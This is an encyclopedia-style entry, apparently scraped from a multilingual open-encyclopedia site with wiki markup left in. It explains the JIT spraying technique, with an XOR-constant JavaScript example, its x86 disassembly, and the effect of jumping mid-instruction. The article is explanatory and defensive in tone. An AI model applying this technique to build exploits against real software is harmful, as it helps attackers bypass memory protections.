| 词条 | JIT spraying |
| 释义 |
A just-in-time compiler (JIT) by definition produces code as its data. Since the purpose is to produce executable data, a JIT compiler is one of the few types of programs that can not be run in a no-executable-data environment. Because of this, JIT compilers are normally exempt from data execution prevention. A JIT spray attack does heap spraying with the generated code. To produce exploit code from JIT, an idea from Dion Blazakis[4] is used. The input program, usually JavaScript or ActionScript, typically contains numerous constant values that can be erroneously executed as code. For example, the XOR operation could be used:[5] var a = (0x11223344^0x44332211^0x44332211^ ...); JIT then will transform bytecode to native x86 code like: 0: b8 44 33 22 11 {{code|2=asm|mov $0x11223344,%eax}} {{code|2=nasm|mov eax,0x11223344}} 5: 35 11 22 33 44 {{code|2=asm|xor $0x44332211,%eax}} {{code|2=nasm|xor eax,0x44332211}} a: 35 11 22 33 44 {{code|2=asm|xor $0x44332211,%eax}} {{code|2=nasm|xor eax,0x44332211}}The attacker then uses a suitable bug to redirect code execution into the newly generated code. For example, a buffer overflow or use after free bug could allow the attack to modify a function pointer or return address. This causes the CPU to execute instructions in a way that was unintended by the JIT authors. The attacker is usually not even limited to the expected instruction boundaries; it is possible to jump into the middle of an intended instruction to have the CPU interpret it as something else. As with non-JIT ROP attacks, this may be enough operations to usefully take control of the computer. Continuing the above example, jumping to the second byte of the "mov" instruction results in an "inc" instruction: 1: 44 {{code|2=asm|inc %esp}} {{code|2=nasm|inc esp}} 2: 33 22 {{code|2=asm|xor (%edx),%esp}} {{code|2=nasm|xor esp,DWORD PTR [edx]}} 4: 11 35 11 22 33 44 {{code|2=asm|adc %esi,0x44332211}} {{code|2=nasm|adc DWORD PTR ds:0x44332211,esi}} a: 35 11 22 33 44 {{code|2=asm|xor $0x44332211,%eax}} {{code|2=nasm|xor eax,0x44332211}}Computer hardware that allows jumping into the middle of an instruction includes x86, x86-64, and ARM. Although especially effective on this type of hardware, JIT spraying works on other systems as well. To protect against JIT spraying, the JIT code can be disabled or made less predictable for the attacker.[4] References1. ^{{cite web|url=http://www.h-online.com/security/features/Return-of-the-sprayer-exploits-to-beat-DEP-and-ASLR-1171463.html|title=Return of the sprayer -- JIT Spraying: Exploits to beat DEP and ASLR|author=Jürgen Schmidt|publisher=The H|date=20 January 2011|accessdate=22 January 2011}} {{computer-security-stub}}2. ^{{cite web|url=http://blog.fortinet.com/jit-spraying-in-pdf/ |title=JIT Spraying in PDF |author=Haifei Li |date=10 February 2010 |publisher=Fortinet blog |accessdate=22 January 2011 |deadurl=yes |archiveurl=https://web.archive.org/web/20100418191105/http://blog.fortinet.com/jit-spraying-in-pdf/ |archivedate=18 April 2010 }} 3. ^{{cite web|url=http://blogs.pcmag.com/securitywatch/2010/02/new_jit_spray_penetrates_best.php|title=New "JIT Spray" Penetrates Best Windows Defenses|author=Larry Seltzer|publisher=PCmag.com|date=4 February 2010|accessdate=22 January 2011}} 4. ^1 {{cite web|author=Dion Blazakis|url=http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf |title=Interpreter Exploitation. Pointer Inference and JIT Spraying|publisher=Black Hat & Defcon 2010}}; {{cite web|url=http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Slides-v2.pdf|title=Slides}} 5. ^[https://packetstormsecurity.com/files/86975/Writing-JIT-Spray-Shellcode-For-Fun-And-Profit.html Writing JIT-Spray Shellcode for fun and profit], Alexey Sintsov, (pdf) 1 : Computer security exploits |
| 随便看 |
|
开放百科全书收录14589846条英语、德语、日语等多语种百科知识,基本涵盖了大多数领域的百科知识,是一部内容自由、开放的电子版国际百科全书。